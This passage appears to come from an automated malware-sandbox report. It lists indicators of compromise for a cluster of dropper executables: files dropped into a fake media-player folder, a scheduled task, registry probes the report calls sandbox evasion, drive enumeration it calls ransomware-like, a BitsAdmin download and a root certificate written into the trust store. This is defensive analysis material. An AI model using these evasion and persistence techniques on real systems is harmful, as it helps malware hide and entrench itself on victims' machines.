C:\Program Files (x86)\lighteningplayer\plugins\demux\libps_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libvod_rtsp_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\httprequests.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\art\01_googleimage.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\dailymotion.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\newgrounds.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libexport_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_xml.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libreal_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_copy_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\anevia_streams.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libaiff_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libavi_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\libvlccore.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libsmb_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files\temp_files\itLdAUYMscN.dll data_load.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\index.html gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\intf\modules\host.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\access\libtcp_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libntservice_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File opened for modification C:\Program Files (x86)\GameBox INC\GameBox\d.jfm note8876.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\mobile_view.html gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\lua\meta\reader\filename.luac gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsfsstorage_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll gw4IdvE5G_HLuaXzgZeN_Zqp.exe File created C:\Program Files (x86)\UltraMediaBurner\unins000.dat ultramediaburner.tmp -
Drops file in Windows directory 25 IoCs
Processes:
msiexec.exesvchost.exeWerFault.exerundll32.exedescription ioc process File opened for modification C:\Windows\Installer\MSICA99.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICBD2.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIECC0.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIF5AA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4667.tmp msiexec.exe File created C:\Windows\Installer\f74c828.msi msiexec.exe File opened for modification C:\Windows\Installer\MSICDD8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSICF21.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE347.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE4CF.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFDD6F4AA1807699DB.TMP msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSID183.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE6F3.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\SystemTemp\~DFC4C73D4F60E8490D.TMP msiexec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\f74c828.msi msiexec.exe File opened for modification C:\Windows\Installer\MSICCBE.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File created C:\Windows\SystemTemp\~DF720229B29AA12D61.TMP msiexec.exe File created C:\Windows\SystemTemp\~DFEAAE4AF7779D1BC1.TMP msiexec.exe File created C:\Windows\Tasks\itLdAUYMscN.job rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 13 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5944 2396 WerFault.exe rnMygaJY9bsTe76aVZpyXwUC.exe 5920 1632 WerFault.exe RTqQYcYpcB8ukNlxo66LwG9g.exe 6128 1328 WerFault.exe 5vMgVG9zA4l9mWyov7brGSyH.exe 4532 3192 WerFault.exe Jc4yVtEOotyL__khOXuqTI3o.exe 1972 4252 WerFault.exe rundll32.exe 4416 2564 WerFault.exe rundll32.exe 4092 4468 WerFault.exe askinstall53.exe 3252 6312 WerFault.exe rundll32.exe 1524 6212 WerFault.exe 9D1E.exe 6008 6760 WerFault.exe explorer.exe 4612 5392 WerFault.exe 1292224.exe 7148 1996 WerFault.exe 4391711.exe 4020 6112 WerFault.exe 8046740.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\gw4IdvE5G_HLuaXzgZeN_Zqp.exe nsis_installer_2 C:\Users\Admin\Documents\gw4IdvE5G_HLuaXzgZeN_Zqp.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
35SM90SrdCDhcnMYcnmUgvQl.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 35SM90SrdCDhcnMYcnmUgvQl.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 35SM90SrdCDhcnMYcnmUgvQl.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 35SM90SrdCDhcnMYcnmUgvQl.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exemsiexec.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 34 IoCs
Processes:
WerFault.execmd.exeWerFault.exemsedge.exeWerFault.exemsedge.exemsiexec.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msiexec.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 5728 taskkill.exe 6444 taskkill.exe -
Modifies data under HKEY_USERS 43 IoCs
Processes:
sihclient.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe -
Modifies registry class 8 IoCs
Processes:
Weather.exeWeather.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{0684325F-8FAA-44B4-9AE1-625060B39C8C} Weather.exe Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-257790753-2419383948-818201544-1000\{C61FE7CB-1A07-4E01-BE33-222EC1A2055D} Weather.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ -
Processes:
Weather Installation.exeGameBoxWin64.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 Weather Installation.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 GameBoxWin64.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 